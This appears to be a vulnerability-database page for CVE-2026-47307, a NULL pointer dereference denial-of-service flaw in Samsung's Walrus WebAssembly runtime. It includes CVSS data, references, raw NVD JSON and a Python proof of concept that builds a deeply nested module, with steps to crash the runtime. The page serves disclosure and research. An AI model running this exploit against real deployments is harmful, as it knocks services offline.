CVE-2026-47307

Description

NULL pointer dereference vulnerability in Samsung Open Source Walrus allows an attacker to cause a denial of service via a crafted WebAssembly module containing deeply nested instructions. This issue affects Walrus: f339b8ee4ea701772e8ae640b3d1b12ac02b1ae9.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Samsung Walrus commit f339b8ee4ea701772e8ae640b3d1b12ac02b1ae9

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-47307: NULL Pointer Dereference in Samsung Walrus
# This script generates a WebAssembly Text (WAT) format with deeply nested instructions.
# The generated WAST can be compiled to binary (.wasm) to trigger the DoS.

def generate_nested_wat(depth):
    # Generate deeply nested blocks
    nested_content = "(nop)"
    for _ in range(depth):
        nested_content = f"(block {nested_content})"
    return f"(module (func (export \"test\") {nested_content}))"

if __name__ == "__main__":
    # Depth might need to be high to trigger the specific condition
    DEPTH = 10000
    wat_code = generate_nested_wat(DEPTH)
    
    print(f"Generated WAT code with depth {DEPTH}:")
    print(wat_code)
    
    # To exploit:
    # 1. Save the output to a file named 'exploit.wat'
    # 2. Use a wat2wasm compiler to convert it to 'exploit.wasm'
    # 3. Load 'exploit.wasm' in the vulnerable Samsung Walrus application.
    # The application should crash due to NULL pointer dereference.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-47307
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-47307
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-47307/
[4] VulDB https://vuldb.com/cve/CVE-2026-47307
[5] https://github.com/Samsung/walrus/pull/409

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-47307", "sourceIdentifier": "[email protected]", "published": "2026-05-19T04:16:31.317", "lastModified": "2026-05-19T14:25:40.320", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "NULL pointer dereference vulnerability in Samsung Open Source Walrus allows an attacker to cause a denial of service via a crafted WebAssembly module containing deeply nested instructions.\n\nThis issue affects Walrus: f339b8ee4ea701772e8ae640b3d1b12ac02b1ae9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "references": [{"url": "https://github.com/Samsung/walrus/pull/409", "source": "[email protected]"}]}}